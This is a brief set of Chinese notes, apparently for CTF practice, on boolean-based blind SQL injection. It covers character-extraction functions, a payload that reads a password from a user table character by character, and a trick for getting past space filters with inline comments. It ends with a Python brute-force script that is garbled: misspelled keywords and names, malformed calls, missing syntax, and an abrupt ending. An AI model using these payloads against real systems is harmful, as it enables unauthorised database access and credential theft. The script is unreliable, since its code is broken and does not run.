bool型盲注
- if(xxxx,1,0)
- substring('xxxx' from 1 for 1)
- select substr('abc' from 1 for 1)
- 从 abc的第一位取一位
- mid('abc' , 1 ,1 ) = mid('abc' from 1 for 1)
- left(str,length)从左边开始截取字符串
转ASCII类型
- ascii(substr('xxx',1,1))=97
- ord() //返回第一个字符的ascii
userid=ascii((substr(select password from user) from 1 for 1))=127
过滤空格时的逃逸方法:利用内敛注释符/**/
improt requests
discts = 'abcdefghijklmnopqrstuvwxyz0123456789'
flag = ''
for x in xrange(1,50)
for x in dicts:
url = ' '
try:
response = request.get(url.timeout =5)
if response.content.find('error password'):
pass